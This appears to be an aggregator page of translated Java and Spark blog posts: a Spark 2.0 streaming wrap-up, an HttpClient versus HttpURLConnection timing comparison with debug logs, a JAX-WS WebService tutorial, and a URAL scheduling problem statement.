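Deep integration with the rest of Spark: Structured Streaming supports interactive queries on streaming data through Spark SQL, joins against static data, and many libraries that already use DataFrames, so developers can build complete applications rather than just streaming pipelines. We expect more integration with MLlib and other libraries in the future.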
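
The idea that an incrementally updated result matches a batch run over the same data can be illustrated with a toy sketch in plain Java. This is not the Structured Streaming API: IncrementalCountSketch, batchCount and update are hypothetical names, and the two event lists simply stand in for data arriving over time.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

final class IncrementalCountSketch {
    // Batch computation: count occurrences over the complete input.
    static Map<String, Integer> batchCount(List<String> events) {
        Map<String, Integer> counts = new HashMap<>();
        for (String e : events) {
            counts.merge(e, 1, Integer::sum);
        }
        return counts;
    }

    // Streaming-style computation: fold each newly arrived chunk into the running state.
    static void update(Map<String, Integer> state, List<String> newEvents) {
        for (String e : newEvents) {
            state.merge(e, 1, Integer::sum);
        }
    }

    public static void main(String[] args) {
        List<String> first = Arrays.asList("click", "view", "click");
        List<String> second = Arrays.asList("view", "purchase");

        // Feed the data in two chunks, as if it arrived over time.
        Map<String, Integer> state = new HashMap<>();
        update(state, first);
        update(state, second);

        // Recompute from scratch over everything seen so far.
        List<String> all = Arrays.asList("click", "view", "click", "view", "purchase");
        System.out.println(state.equals(batchCount(all)));
    }
}
```

In a real engine the hard part is keeping that running state correct across failures and restarts, which is exactly the bookkeeping the text says the system takes over from the developer.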

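Spark 2.0 ships with an initial alpha version of the Structured Streaming API, a (very small) extension to the DataFrame/Dataset API. Thanks to this unification, it is easy for existing Spark users to adopt: they can apply what they know about the Spark batch API to answer new questions in real time. Key features include support for event-time based processing, out-of-order and delayed data, sessionization, and tight integration with non-streaming data sources and sinks.

We also updated the Databricks workspace to support Structured Streaming. For example, when a streaming query is launched, the notebook UI automatically displays its status.

[Figure: streaming query status in the notebook UI]

Streaming is clearly a broad topic, so stay tuned to this blog for more on Structured Streaming in Spark 2.0.

Conclusion

Spark users initially came to Spark for its ease of use and performance. Spark 2.0 doubles down on both and extends support to a wider range of workloads. Please give the new release a try.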

Author: zhengyongqianluck, posted 2016/7/31 0:35:58

↧

HTTPClient vs. HttpURLConnection: A Worked Comparison

July 31, 2016, 12:37 am

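HttpURLConnection is a standard Java class and comes with no higher-level wrapping.

HTTPClient is an open-source library that wraps the request headers, parameters, request body, response, and so on.

Put simply, HTTPClient is an enhanced HttpURLConnection: everything HttpURLConnection can do, HTTPClient can do as well, and it adds some features HttpURLConnection lacks. Its focus is still limited to sending requests, receiving responses, and managing HTTP connections.

Example: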

package com.cn.common.controller;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpStatus;
import org.apache.commons.httpclient.methods.PostMethod;
import org.apache.commons.httpclient.params.HttpMethodParams;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
@Controller
@RequestMapping("/http")
public class HttpClientAndURLConnectionController {

	@RequestMapping("/testHttp")
	public void testHttp(HttpServletRequest req,HttpServletResponse resp) {
		try {
			long s1 = System.currentTimeMillis();
			testHttpClient();
			long s2 = System.currentTimeMillis();
			testHttpURlConnection();
			long s3 = System.currentTimeMillis();
			System.out.println((s2-s1)+" "+(s3-s2));
		} catch (IOException e) {
			e.printStackTrace();
		}
	}
	public void testHttpClient() throws IOException{
		System.out.println("testHttpClient");
		// Request setup
    	String result="";
    	String url = "http://192.168.2.111:8088/era/user/getUserById";
    	HttpClient client =new HttpClient();
    	// Set the connection timeout (milliseconds)
    	client.getHttpConnectionManager().getParams().setConnectionTimeout(30000);
    	// Use UTF-8 for content to avoid garbled characters
    	client.getParams().setParameter(HttpMethodParams.HTTP_CONTENT_CHARSET,"UTF-8");
    	PostMethod method =new PostMethod(url);
    	// Pass the request parameter
    	method.addParameter("userId", "100");
    	int status = client.executeMethod(method);
    	if(status == HttpStatus.SC_OK){
    		result = method.getResponseBodyAsString();
    	}
    	System.out.println(result);
    	method.releaseConnection();
    }
	public void testHttpURlConnection() throws IOException{
		System.out.println("testHttpURlConnection");
        String result = "";
        URL url = new URL("http://192.168.2.111:8088/era/user/getUserById");
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setConnectTimeout(30000);// timeout for connecting to the host (milliseconds)
        conn.setReadTimeout(30000);// timeout for reading data from the host (milliseconds)
        conn.setRequestMethod("POST");// use POST; the default is GET
        conn.setDoInput(true);// whether to read from the connection; true by default
        conn.setDoOutput(true);// whether to write to the connection; a POST carries its parameters in the HTTP body, so this must be true (false by default)
        conn.setUseCaches(false);// POST requests must not use the cache
        conn.setInstanceFollowRedirects(false);
        conn.setRequestProperty("Content-Type", "text/html; charset=utf-8");
        conn.connect();
        int responsecode = conn.getResponseCode();
        if(responsecode == HttpURLConnection.HTTP_OK){ // the status code from the status line of the HTTP response
        	// Read the response stream, i.e. the body of the HTTP response
        	InputStream urlStream = conn.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(urlStream,"utf-8"));
            String s = "";
            while ((s = reader.readLine()) != null) {
                result += s;
            }
            reader.close();
            urlStream.close();
        }
        System.out.println(result);
        if(conn != null){
        	conn.disconnect();
        }
    }
}
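
Note that testHttpURlConnection enables output but never writes a request body, so the server falls back to its default userId of 100. A minimal sketch of sending the parameter as a form-encoded body with HttpURLConnection follows, using only the JDK. The local echo server built on com.sun.net.httpserver.HttpServer and the names FormPostSketch, postForm, readAll and demo are assumptions made for this illustration, not part of the original project.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.UncheckedIOException;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.URI;
import java.nio.charset.StandardCharsets;

final class FormPostSketch {
    // Sends a form-encoded POST body and returns the response body ("" on a non-200 status).
    static String postForm(String endpoint, String formBody) throws IOException {
        HttpURLConnection conn = (HttpURLConnection) URI.create(endpoint).toURL().openConnection();
        try {
            conn.setConnectTimeout(30000);
            conn.setReadTimeout(30000);
            conn.setRequestMethod("POST");
            conn.setDoOutput(true); // required before writing a request body
            conn.setRequestProperty("Content-Type",
                    "application/x-www-form-urlencoded; charset=UTF-8");
            try (OutputStream out = conn.getOutputStream()) {
                out.write(formBody.getBytes(StandardCharsets.UTF_8));
            }
            if (conn.getResponseCode() != HttpURLConnection.HTTP_OK) {
                return "";
            }
            try (InputStream in = conn.getInputStream()) {
                return new String(readAll(in), StandardCharsets.UTF_8);
            }
        } finally {
            conn.disconnect();
        }
    }

    // Reads a stream to the end and returns its bytes.
    static byte[] readAll(InputStream in) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        byte[] chunk = new byte[4096];
        int n;
        while ((n = in.read(chunk)) != -1) {
            buf.write(chunk, 0, n);
        }
        return buf.toByteArray();
    }

    // Starts a throwaway local server that echoes the request body, posts to it,
    // and returns what came back.
    static String demo() {
        try {
            HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
            server.createContext("/echo", exchange -> {
                byte[] body = readAll(exchange.getRequestBody());
                exchange.sendResponseHeaders(200, body.length);
                try (OutputStream out = exchange.getResponseBody()) {
                    out.write(body);
                }
            });
            server.start();
            try {
                int port = server.getAddress().getPort();
                return postForm("http://127.0.0.1:" + port + "/echo", "userId=100");
            } finally {
                server.stop(0);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(demo());
    }
}
```

With the form content type and a written body, a servlet's getParameter("userId") can see the value, which is what the HttpClient version achieves through addParameter.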

The handler behind the URL being called:

@RequestMapping("/getUserById")
public void getUserById(HttpServletRequest req,HttpServletResponse resp) throws IOException{
    resp.setContentType("text/html;charset=utf-8");
    resp.setCharacterEncoding("UTF-8");
    int userId;
    if(null == req.getParameter("userId")){
    	userId = 100;
    }else{
    	userId = Integer.parseInt(req.getParameter("userId"));
    }
    User user = this.userService.selectByPrimaryKey(userId);
    ObjectMapper mapper = new ObjectMapper();
    String result = mapper.writeValueAsString(user);
    resp.getWriter().print(result);
}

Console output from the first call to testHttp after the project starts:

testHttpClient
2016-07-31 00:24:46,513 DEBUG [org.apache.commons.httpclient.HttpClient] - Java version: 1.7.0_75
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Java vendor: Oracle Corporation
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Java class path: D:\apache-tomcat-8.0.33/bin/bootstrap.jar;D:\apache-tomcat-8.0.33/bin/tomcat-juli.jar;D:\Program Files\Java\jdk1.7.0_75/lib/tools.jar
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Operating system name: Windows 8.1
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Operating system architecture: amd64
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Operating system version: 6.3
2016-07-31 00:24:46,516 DEBUG [org.apache.commons.httpclient.HttpClient] - SUN 1.7: SUN (DSA key/parameter generation; DSA signing; SHA-1, MD5 digests; SecureRandom; X.509 certificates; JKS keystore; PKIX CertPathValidator; PKIX CertPathBuilder; LDAP, Collection CertStores, JavaPolicy Policy; JavaLoginConfig Configuration)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunRsaSign 1.7: Sun RSA signature provider
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunEC 1.7: Sun Elliptic Curve provider (EC, ECDSA, ECDH)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunJSSE 1.7: Sun JSSE provider(PKCS12, SunX509 key/trust factories, SSLv3, TLSv1)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunJCE 1.7: SunJCE Provider (implements RSA, DES, Triple DES, AES, Blowfish, ARCFOUR, RC2, PBE, Diffie-Hellman, HMAC)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunJGSS 1.7: Sun (Kerberos v5, SPNEGO)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunSASL 1.7: Sun SASL provider(implements client mechanisms for: DIGEST-MD5, GSSAPI, EXTERNAL, PLAIN, CRAM-MD5, NTLM; server mechanisms for: DIGEST-MD5, GSSAPI, CRAM-MD5, NTLM)
2016-07-31 00:24:46,518 DEBUG [org.apache.commons.httpclient.HttpClient] - XMLDSig 1.0: XMLDSig (DOM XMLSignatureFactory; DOM KeyInfoFactory)
2016-07-31 00:24:46,518 DEBUG [org.apache.commons.httpclient.HttpClient] - SunPCSC 1.7: Sun PC/SC provider
2016-07-31 00:24:46,518 DEBUG [org.apache.commons.httpclient.HttpClient] - SunMSCAPI 1.7: Sun's Microsoft Crypto API provider
2016-07-31 00:24:46,535 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.useragent = Jakarta Commons-HttpClient/3.1
2016-07-31 00:24:46,549 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.version = HTTP/1.1
2016-07-31 00:24:46,556 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.connection-manager.class = class org.apache.commons.httpclient.SimpleHttpConnectionManager
2016-07-31 00:24:46,556 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.cookie-policy = default
2016-07-31 00:24:46,557 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.element-charset = US-ASCII
2016-07-31 00:24:46,557 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.content-charset = ISO-8859-1
2016-07-31 00:24:46,562 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.method.retry-handler = org.apache.commons.httpclient.DefaultHttpMethodRetryHandler@a9d5438
2016-07-31 00:24:46,563 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.dateparser.patterns = [EEE, dd MMM yyyy HH:mm:ss zzz, EEEE, dd-MMM-yy HH:mm:ss zzz, EEE MMM d HH:mm:ss yyyy, EEE, dd-MMM-yyyy HH:mm:ss z, EEE, dd-MMM-yyyy HH-mm-ss z, EEE, dd MMM yy HH:mm:ss z, EEE dd-MMM-yyyy HH:mm:ss z, EEE dd MMM yyyy HH:mm:ss z, EEE dd-MMM-yyyy HH-mm-ss z, EEE dd-MMM-yy HH:mm:ss z, EEE dd MMM yy HH:mm:ss z, EEE,dd-MMM-yy HH:mm:ss z, EEE,dd-MMM-yyyy HH:mm:ss z, EEE, dd-MM-yyyy HH:mm:ss z]
2016-07-31 00:24:46,588 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.connection.timeout = 30000
2016-07-31 00:24:46,588 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.content-charset = UTF-8
2016-07-31 00:24:46,727 DEBUG [org.apache.commons.httpclient.HttpConnection] - Open connection to 192.168.2.111:8088
2016-07-31 00:24:46,744 DEBUG [httpclient.wire.header] - >> "POST /era/user/getUserById HTTP/1.1[\r][\n]"
2016-07-31 00:24:46,747 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Adding Host request header
2016-07-31 00:24:46,871 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Default charset used: UTF-8
2016-07-31 00:24:46,900 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Default charset used: UTF-8
2016-07-31 00:24:46,902 DEBUG [httpclient.wire.header] - >> "User-Agent: Jakarta Commons-HttpClient/3.1[\r][\n]"
2016-07-31 00:24:46,903 DEBUG [httpclient.wire.header] - >> "Host: 192.168.2.111:8088[\r][\n]"
2016-07-31 00:24:46,903 DEBUG [httpclient.wire.header] - >> "Content-Length: 10[\r][\n]"
2016-07-31 00:24:46,903 DEBUG [httpclient.wire.header] - >> "Content-Type: application/x-www-form-urlencoded[\r][\n]"
2016-07-31 00:24:46,907 DEBUG [httpclient.wire.header] - >> "[\r][\n]"
2016-07-31 00:24:46,911 DEBUG [httpclient.wire.content] - >> "userId=100"
2016-07-31 00:24:46,913 DEBUG [org.apache.commons.httpclient.methods.EntityEnclosingMethod] - Request body sent
2016-07-31 00:24:47,041 DEBUG [org.mybatis.spring.SqlSessionUtils] - Creating a new SqlSession
2016-07-31 00:24:47,074 DEBUG [org.mybatis.spring.SqlSessionUtils] - SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@631e7edd] was not registered for synchronization because synchronization is not active
2016-07-31 00:24:47,168 DEBUG [org.mybatis.spring.transaction.SpringManagedTransaction] - JDBC Connection [com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl@155b4677] will not be managed by Spring
2016-07-31 00:24:47,197 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==>  Preparing: select id, user_name, password, age from user where id = ? 
2016-07-31 00:24:47,756 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==> Parameters: 100(Integer)
2016-07-31 00:24:47,848 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - <==      Total: 1
2016-07-31 00:24:47,852 DEBUG [com.alibaba.druid.pool.PreparedStatementPool] - {conn-10001, pstmt-20000} enter cache
2016-07-31 00:24:47,854 DEBUG [org.mybatis.spring.SqlSessionUtils] - Closing non transactional SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@631e7edd]
2016-07-31 00:24:48,085 DEBUG [httpclient.wire.header] - << "HTTP/1.1 200 OK[\r][\n]"
2016-07-31 00:24:48,086 DEBUG [httpclient.wire.header] - << "HTTP/1.1 200 OK[\r][\n]"
2016-07-31 00:24:48,089 DEBUG [httpclient.wire.header] - << "Server: Apache-Coyote/1.1[\r][\n]"
2016-07-31 00:24:48,090 DEBUG [httpclient.wire.header] - << "Content-Type: text/html;charset=UTF-8[\r][\n]"
2016-07-31 00:24:48,090 DEBUG [httpclient.wire.header] - << "Content-Length: 67[\r][\n]"
2016-07-31 00:24:48,090 DEBUG [httpclient.wire.header] - << "Date: Sat, 30 Jul 2016 16:24:48 GMT[\r][\n]"
2016-07-31 00:24:48,091 DEBUG [httpclient.wire.header] - << "[\r][\n]"
2016-07-31 00:24:48,095 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Buffering response body
2016-07-31 00:24:48,095 DEBUG [httpclient.wire.content] - << "{"id":100,"userName":"admin[0xe7][0xae][0xa1][0xe7][0x90][0x86][0xe5][0x91][0x98]","password":"123456","age":25}"
2016-07-31 00:24:48,097 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Resorting to protocol version default close connection policy
2016-07-31 00:24:48,097 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Should NOT close connection, using HTTP/1.1
2016-07-31 00:24:48,098 DEBUG [org.apache.commons.httpclient.HttpConnection] - Releasing connection back to connection manager.
{"id":100,"userName":"admin管理员","password":"123456","age":25}
testHttpURlConnection
2016-07-31 00:24:48,127 DEBUG [org.mybatis.spring.SqlSessionUtils] - Creating a new SqlSession
2016-07-31 00:24:48,129 DEBUG [org.mybatis.spring.SqlSessionUtils] - SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@1ee42c08] was not registered for synchronization because synchronization is not active
2016-07-31 00:24:48,129 DEBUG [org.mybatis.spring.transaction.SpringManagedTransaction] - JDBC Connection [com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl@155b4677] will not be managed by Spring
2016-07-31 00:24:48,130 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==>  Preparing: select id, user_name, password, age from user where id = ? 
2016-07-31 00:24:48,131 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==> Parameters: 100(Integer)
2016-07-31 00:24:48,137 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - <==      Total: 1
2016-07-31 00:24:48,138 DEBUG [org.mybatis.spring.SqlSessionUtils] - Closing non transactional SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@1ee42c08]
{"id":100,"userName":"admin管理员","password":"123456","age":25}
1598 58

After the first run:

testHttpClient() took 1598 ms

testHttpURlConnection() took 58 ms

Console output from the second call to testHttp:

testHttpClient
2016-07-31 00:28:09,582 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.connection.timeout = 30000
2016-07-31 00:28:09,582 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.content-charset = UTF-8
2016-07-31 00:28:09,583 DEBUG [org.apache.commons.httpclient.HttpConnection] - Open connection to 192.168.2.111:8088
2016-07-31 00:28:09,586 DEBUG [httpclient.wire.header] - >> "POST /era/user/getUserById HTTP/1.1[\r][\n]"
2016-07-31 00:28:09,587 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Adding Host request header
2016-07-31 00:28:09,587 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Default charset used: UTF-8
2016-07-31 00:28:09,590 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Default charset used: UTF-8
2016-07-31 00:28:09,591 DEBUG [httpclient.wire.header] - >> "User-Agent: Jakarta Commons-HttpClient/3.1[\r][\n]"
2016-07-31 00:28:09,592 DEBUG [httpclient.wire.header] - >> "Host: 192.168.2.111:8088[\r][\n]"
2016-07-31 00:28:09,592 DEBUG [httpclient.wire.header] - >> "Content-Length: 10[\r][\n]"
2016-07-31 00:28:09,593 DEBUG [httpclient.wire.header] - >> "Content-Type: application/x-www-form-urlencoded[\r][\n]"
2016-07-31 00:28:09,593 DEBUG [httpclient.wire.header] - >> "[\r][\n]"
2016-07-31 00:28:09,593 DEBUG [httpclient.wire.content] - >> "userId=100"
2016-07-31 00:28:09,594 DEBUG [org.apache.commons.httpclient.methods.EntityEnclosingMethod] - Request body sent
2016-07-31 00:28:09,601 DEBUG [org.mybatis.spring.SqlSessionUtils] - Creating a new SqlSession
2016-07-31 00:28:09,602 DEBUG [org.mybatis.spring.SqlSessionUtils] - SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@240543cf] was not registered for synchronization because synchronization is not active
2016-07-31 00:28:09,603 DEBUG [org.mybatis.spring.transaction.SpringManagedTransaction] - JDBC Connection [com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl@155b4677] will not be managed by Spring
2016-07-31 00:28:09,605 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==>  Preparing: select id, user_name, password, age from user where id = ? 
2016-07-31 00:28:09,606 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==> Parameters: 100(Integer)
2016-07-31 00:28:09,611 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - <==      Total: 1
2016-07-31 00:28:09,612 DEBUG [org.mybatis.spring.SqlSessionUtils] - Closing non transactional SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@240543cf]
2016-07-31 00:28:09,616 DEBUG [httpclient.wire.header] - << "HTTP/1.1 200 OK[\r][\n]"
2016-07-31 00:28:09,617 DEBUG [httpclient.wire.header] - << "HTTP/1.1 200 OK[\r][\n]"
2016-07-31 00:28:09,617 DEBUG [httpclient.wire.header] - << "Server: Apache-Coyote/1.1[\r][\n]"
2016-07-31 00:28:09,617 DEBUG [httpclient.wire.header] - << "Content-Type: text/html;charset=UTF-8[\r][\n]"
2016-07-31 00:28:09,618 DEBUG [httpclient.wire.header] - << "Content-Length: 67[\r][\n]"
2016-07-31 00:28:09,618 DEBUG [httpclient.wire.header] - << "Date: Sat, 30 Jul 2016 16:28:09 GMT[\r][\n]"
2016-07-31 00:28:09,618 DEBUG [httpclient.wire.header] - << "[\r][\n]"
2016-07-31 00:28:09,618 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Buffering response body
2016-07-31 00:28:09,619 DEBUG [httpclient.wire.content] - << "{"id":100,"userName":"admin[0xe7][0xae][0xa1][0xe7][0x90][0x86][0xe5][0x91][0x98]","password":"123456","age":25}"
2016-07-31 00:28:09,619 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Resorting to protocol version default close connection policy
2016-07-31 00:28:09,619 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Should NOT close connection, using HTTP/1.1
2016-07-31 00:28:09,620 DEBUG [org.apache.commons.httpclient.HttpConnection] - Releasing connection back to connection manager.
{"id":100,"userName":"admin管理员","password":"123456","age":25}
testHttpURlConnection
2016-07-31 00:28:09,629 DEBUG [org.mybatis.spring.SqlSessionUtils] - Creating a new SqlSession
2016-07-31 00:28:09,630 DEBUG [org.mybatis.spring.SqlSessionUtils] - SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@4636317d] was not registered for synchronization because synchronization is not active
2016-07-31 00:28:09,631 DEBUG [org.mybatis.spring.transaction.SpringManagedTransaction] - JDBC Connection [com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl@155b4677] will not be managed by Spring
2016-07-31 00:28:09,631 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==>  Preparing: select id, user_name, password, age from user where id = ? 
2016-07-31 00:28:09,632 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==> Parameters: 100(Integer)
2016-07-31 00:28:09,637 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - <==      Total: 1
2016-07-31 00:28:09,640 DEBUG [org.mybatis.spring.SqlSessionUtils] - Closing non transactional SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@4636317d]
{"id":100,"userName":"admin管理员","password":"123456","age":25}
39 25

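After the second run:

testHttpClient() took 39 ms

testHttpURlConnection() took 25 ms

The first run is dominated by one-time costs visible in the log, such as HttpClient initialization and the server's first database query, so the second run is the fairer comparison. Overall, under heavy load or a continuous stream of requests, HttpClient is not much slower than HttpURLConnection, because it keeps the underlying socket connection open and does not have to reconnect each time.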

Author: aqsunkai, posted 2016/7/31 0:37:19

↧

Native WebService Development (Server Side / Generating the Client Automatically with JDK Tools)

July 31, 2016, 12:43 am

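I wrote my first WebService a year ago. I still have the code, but I have forgotten how I built it, because I never wrote down some of the key points at the time.

I have recently been reading through a project that happens to use WebService, so I am picking it up again and writing a demo as a refresher.

This demo does not use any WebService framework such as CXF. I may write one with a framework later when I have time.

First, the project structure.

There are three classes in total:

an interface, a class implementing the interface, and a main method that publishes the WebService.

Here is the code.

Note that the interface needs the @WebService annotation.

Each method on the interface needs the @WebMethod annotation.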

package com.test.webservice;

import javax.jws.WebMethod;
import javax.jws.WebService;

@WebService
public interface WebServiceServerInterface {
	@WebMethod
	public String sayHello(String name);
	
}

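Interface implementation

Anything will do here, as long as it gets the idea across.

The implementation class also needs the @WebService annotation.

Its methods, however, do not need to be annotated again.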

package com.test.webservice;

import javax.jws.WebService;

@WebService
public class WebServiceServerImpl implements WebServiceServerInterface {

	@Override
	public String sayHello(String name) {
		System.out.println("Server : " + name);
		return "Hello " + name;
	}

}

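Then write a main method that uses the JDK's Endpoint class to publish the WebService.

Note: Endpoint.publish()

takes two arguments.

The first argument is the address at which the WebService is published. The path after the port number is up to you, and so is the final segment (named after the method here).

The second argument is an instance of the implementation class.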

package com.test.webservice;

import javax.xml.ws.Endpoint;

public class Main {
	public static void main(String[] args) {
		String address = "http://localhost:8088/WebServiceDemo/sayHello";
		Endpoint.publish(address, new WebServiceServerImpl());
		System.out.println("WebService Server published successfully");
	}
}

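Run the main method and that is it. The program keeps running, as the small red stop button shows.

Next, we use the tool built into Eclipse to simulate a client call.

Note that Eclipse should (preferably) be in the Java EE perspective.

Click the "globe" button (Open Web Browser) and enter the address of the published WebService in the address bar.

Note that the URL entered here must have the "?wsdl" suffix appended to the published address; otherwise the browser reports that the page cannot be displayed.

If the WSDL document appears, the server has been published successfully.

Then click the button next to the "globe" button, "Launch the Web Services Explorer".

Click the buttons in the order marked in the screenshot.

Then enter the address of the published WebService in the input box.

Click Go.

And there it is.

Then click the sayHello method under Operation.

Then the result appears.

That simulates a client calling the server.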

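That covers the simulated client built into Eclipse.

But how do you write a real client?

Preparation: first, the JDK environment variables must be configured on your machine.

Second, a reminder: do not stop the main method that publishes the WebService.

The JDK's bin directory contains a program called wsimport.exe. We use it to generate the WebService client.

First create a WebService Client project.

I use Windows as the example here. If you are on Linux, I do not know the details; search for them.

Open a DOS command prompt, i.e. cmd.

Then, at the prompt, change into the src folder of the WebService Client project.

Like this.

Now for the moment of truth.

At the prompt, enter wsimport -keep followed by the URL of the WebService you published.

Like this.

Remember to append ?wsdl to the address.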
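The command described above can be sketched in code. This is only an illustration: the class WsimportCommand and its methods are hypothetical helpers, not part of the JDK, and the address is the one published by the Main class earlier. Note also that wsimport shipped with the JDK only up to Java 10.

```java
import java.util.Arrays;
import java.util.List;

/** Hypothetical helper: builds the wsimport command line for a published endpoint. */
class WsimportCommand {

    /** Appends "?wsdl" to the publish address unless it is already there. */
    static String wsdlUrl(String address) {
        return address.endsWith("?wsdl") ? address : address + "?wsdl";
    }

    /** Returns the command as an argument list, e.g. for ProcessBuilder. */
    static List<String> build(String address) {
        return Arrays.asList("wsimport", "-keep", wsdlUrl(address));
    }

    public static void main(String[] args) {
        String address = "http://localhost:8088/WebServiceDemo/sayHello";
        // Prints: wsimport -keep http://localhost:8088/WebServiceDemo/sayHello?wsdl
        System.out.println(String.join(" ", build(address)));
    }
}
```

The sketch only builds the command; it does not run it, so it works even when the server is not started.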

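Now refresh the WebService Client project. Notice anything new?

So here is the question: with this many classes, which one should I call?

Let's look at the WSDL document.

Near the bottom of the document

there is a <service> tag. It names the class we need to call, and you can find it among the generated classes above.

The <port> tag under <service> names the port, which the generated service class exposes through a getter method.

Now let's write some client code to call it.

First I create the service object,

then call the port method on the service object.

When writing this code, pay attention to what it returns:

it returns an interface.

Then we call the server's method through that interface.

That's all.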

Author: Simba_cheng, posted 2016/7/31 0:43:01

↧

URAL 2026 Dean and Schedule: greedy, deque, queue

July 31, 2016, 12:44 am


C - Dean and Schedule

Time Limit:1000MS Memory Limit:65536KB 64bit IO Format:%I64d & %I64u

Submit Status Practice URAL 2026

Description

A new academic year approaches, and the dean must make a schedule of classes for first-year students. There must be n classes in the schedule. The dean should take into account the following interesting observation made in recent years: students skip all classes with even numbers and attend all classes with odd numbers (the classes are numbered from 1). Of course the dean wants students to attend as many important classes as possible, so he tries to assign subjects that are more important to places with odd numbers and subjects that are less important to places with even numbers. The method of estimating the quality of the schedule at the Department of Mathematics and Mechanics must be as formal as possible.

The first-year schedule may contain any of 26 subjects taught at the department. We denote them by English letters from a to z. The importance of a subject corresponds to its position in the English alphabet. Thus, subject a has importance 1, and subject z has importance 26. The quality of a schedule is the sum of importances of subjects in it, where subjects on odd places are counted with a plus sign, and subjects on even places are counted with a minus sign.

Unfortunately, a schedule has some restrictions due to administrative reasons. First, the schedule must contain at least k different subjects, so the dean cannot occupy all odd places with mathematical analysis and all even places with philosophy. Second, certain subjects must be assigned to certain places. Help the dean to make a schedule of maximum quality under these restrictions.

Input

The first line contains a string of length n (1 ≤ n ≤ 10^5) consisting of lowercase English letters and question marks. The string specifies the subjects that are already in the schedule. The letters denote these subjects, and the question marks stand for vacant places.

In the second line you are given an integer k (1 ≤ k ≤ 26), which is the minimum number of different subjects in the schedule.

Output

If it is impossible to replace all question marks by lowercase English letters so that the string would contain at least k different letters, output “-1” (without quotation marks). Otherwise, output any of the resulting strings that maximizes the quality of the schedule given by the string.

Sample Input

input	output
?? 1	za
?? 3	-1
aza 1	aza
aza 3	-1

Notes

